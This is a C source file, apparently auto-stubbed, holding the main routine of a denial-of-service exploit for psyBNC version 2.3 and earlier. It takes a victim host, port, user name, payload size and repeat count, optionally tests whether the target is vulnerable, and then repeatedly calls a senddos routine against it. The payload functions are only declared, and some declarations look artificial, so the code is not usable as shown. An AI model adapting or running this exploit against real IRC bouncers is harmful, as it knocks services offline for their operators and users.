
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int target ;


 int EOF ;
 int PORT ;
 int SIZE ;
 int USER ;
 int atoi (int ) ;
 int exit (int) ;
 int force ;
 int getopt (int,char**,char*) ;
 scalar_t__ malloc (int ) ;
 int memcpy (char*,int ,int ) ;
 int optarg ;
 int printf (char*,...) ;
 int senddos (int,int,char*,char*) ;
 int strlen (int ) ;
 int strncpy (char*,int ,int) ;
 int testvuln (int,char*) ;
 int usage (char*) ;

int main(int argc, char *argv[])
{
  int c, i, z;
  int port, size, times;
  int u_t = 0, d_t = 0, n_t = 0, p_t = 0, s_t = 0, t_t;
  char target[1024], *user;

  printf("[+] ES psyBNC <= 2.3 DoS\n");
  printf("[+] Information System Advancement in Penetration (ISAP) Labs\n");
  printf("[+] By: Lunar Fault [ElectronicSouls]\n");

  if(argc < 2) { usage(argv[0]);}

  while ((c = getopt (argc, argv, "d:n:p:s:u:hft"))!=EOF) {
    switch(c) {
    case 'h':
      usage(argv[0]);
      break;
    case 'f':
      force = 1;
      break;
    case 'd':
      strncpy(target, optarg, sizeof(target));
      d_t = 1;
      break;
    case 'n':
      times = atoi(optarg);
      n_t = 1;
      break;
    case 'p':
      port = atoi(optarg);
      p_t = 1;
      break;
    case 's':
      size = atoi(optarg);
      s_t = 1;
      break;
    case 't':
      t_t = 1;
      break;
    case 'u':
      user = (char *) malloc(strlen(optarg));
      memcpy(user, optarg, strlen(optarg));
      u_t = 1;
      break;
    }
  }

  if (d_t == 0) { usage(argv[0]); }

  if (n_t == 0) times = 3;

  if (p_t == 0) port = PORT;

  if (s_t == 0) size = SIZE;

  if (u_t == 0) {
    user = (char *) malloc(strlen(USER));
    memcpy(user, USER, strlen(USER));
  }

  printf("[*] Victim: %s\n", target);
  printf("[*] Port: %d\n", port);
  printf("[*] User: %s\n", user);
  printf("[*] Size: %d\n", size);
  printf("[*] Times: %d\n", times);

  if (t_t == 1) {
    printf("[*] Testing for vulnerability\n");
    z = testvuln(port, target);
    printf("\n");
    if (z == -1) {
      printf("[!] Failed to test Vuln!\n");
      exit(1);
    }
    return 0;
  }

  if (force == 1)
    printf("[*] Forceing DoS\n");

  for (i = 0; i < times; i++) {
    z = senddos(port, size, target, user);
    if (z == -1) {
      printf("[!] Failed on sending DoS!\n");
      exit(1);
    }
  }

  printf("[*] DoS sent %d times\n\n", times);
  return 0;
}
